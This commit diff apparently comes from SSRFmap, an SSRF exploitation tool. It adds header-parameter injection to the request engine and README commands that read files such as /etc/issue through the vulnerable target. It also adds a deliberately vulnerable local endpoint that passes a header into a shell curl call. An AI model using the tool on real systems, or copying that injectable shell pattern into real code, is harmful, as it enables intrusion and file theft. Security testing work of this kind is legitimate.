Injection in headers

README.md

@@ -108,6 +108,12 @@ Use the `-m` followed by module name (separated by a `,` if you want to launch s
 python ssrfmap.py -r examples/request.txt -p url -m readfiles,portscan
 ```
 
+If you want to inject inside a header, a GET or a POST parameter, you only need to specify the parameter name
+
+```powershell
+python ssrfmap.py -r examples/request6.txt -p X-Custom-Header -m readfiles --rfiles /tmp/test
+```
+
 If you need to have a custom user-agent use the `--uagent`. Some targets will use HTTPS, you can enable it with `--ssl`.
 
 ```powershell
@@ -115,7 +121,7 @@ If you need to have a custom user-agent use the `--uagent`. Some targets will us
 python ssrfmap.py -r examples/request.txt -p url -m portscan --ssl --uagent "SSRFmapAgent"
 ```
 
-Some modules allow you to create a connect back, you have to specify LHOST and LPORT. Also SSRFmap can listen for the incoming reverse shell.
+Some modules allow you to create a connect back, you have to specify `LHOST` and `LPORT`. Also SSRFmap can listen for the incoming reverse shell.
 
 ```powershell
 # Triggering a reverse shell on a Redis
@@ -148,6 +154,17 @@ A quick way to test the framework can be done with `data/example.py` SSRF servic
   docker exec -it example python ssrfmap.py -r examples/request.txt -p url -m readfiles
   ```
 
+Launch the tests requests:
+
+```ps1
+docker exec -it example python ssrfmap.py -r examples/request.txt -p url -m readfiles --rfiles /etc/issue
+docker exec -it example python ssrfmap.py -r examples/request2.txt -p url -m readfiles --rfiles /etc/issue
+docker exec -it example python ssrfmap.py -r examples/request3.txt -p url -m readfiles --rfiles /etc/issue
+docker exec -it example python ssrfmap.py -r examples/request4.txt -p url -m readfiles --rfiles /etc/issue
+docker exec -it example python ssrfmap.py -r examples/request5.txt -p url -m readfiles --rfiles /etc/issue
+docker exec -it example python ssrfmap.py -r examples/request6.txt -p X-Custom-Header -m readfiles --rfiles /etc/issue
+```
+
 
 ## Contribute
 

core/requester.py

@@ -75,6 +75,15 @@ class Requester(object):
 
     def do_request(self, param, value, timeout=3, stream=False):
         try:
+            # Handle injection in the headers
+            # Copying data to avoid multiple variables edit
+            header_injected = self.headers.copy()
+            if param in self.headers:
+                header_injected[param] = value
+                print('inject in header')
+                print(header_injected)
+
+
             if self.method == "POST":
                 # Copying data to avoid multiple variables edit
                 data_injected = self.data.copy()
@@ -86,7 +95,7 @@ class Requester(object):
                     if self.headers['Content-Type'] and "application/json" in self.headers['Content-Type']:
                         r = requests.post(
                             self.protocol + "://" + self.host + self.action, 
-                            headers=self.headers, 
+                            headers=header_injected, 
                             json=data_injected,
                             timeout=timeout,
                             stream=stream,
@@ -99,7 +108,7 @@ class Requester(object):
                         if param == '': data_injected = value
                         r = requests.post(
                             self.protocol + "://" + self.host + self.action, 
-                            headers=self.headers, 
+                            headers=header_injected, 
                             data=data_injected,
                             timeout=timeout,
                             stream=stream,
@@ -116,7 +125,7 @@ class Requester(object):
 
                             r = requests.post(
                                 self.protocol + "://" + self.host + self.action, 
-                                headers=self.headers, 
+                                headers=header_injected, 
                                 data=data_xml,
                                 timeout=timeout,
                                 stream=stream,
@@ -137,7 +146,7 @@ class Requester(object):
                 data_injected = re.sub(regex, param+'='+value, self.action)
                 r = requests.get(
                     self.protocol + "://" + self.host + data_injected, 
-                    headers=self.headers,
+                    headers=header_injected,
                     timeout=timeout,
                     stream=stream,
                     verify=False,

examples/example.py

@@ -48,6 +48,15 @@ def ssrf4():
     except Exception as e:
         return e
 
+
+# curl -v "http://127.0.0.1:5000/ssrf5" -H 'X-Custom-Header: http://example.com'
+@app.route("/ssrf5", methods=['GET'])
+def ssrf5():
+    data = request.headers.get('X-Custom-Header')
+    content = command(f"curl {data}")
+    return content
+
+
 def command(cmd):
     proc = subprocess.Popen(cmd, stdout=subprocess.PIPE, shell=True)
     (out, err) = proc.communicate()

examples/request6.txt

@@ -0,0 +1,10 @@
+GET /ssrf5 HTTP/1.1
+Host: 127.0.0.1:5000
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://mysimple.ssrf/
+X-Custom-Header: http://example.com
+Connection: close
+Upgrade-Insecure-Requests: 1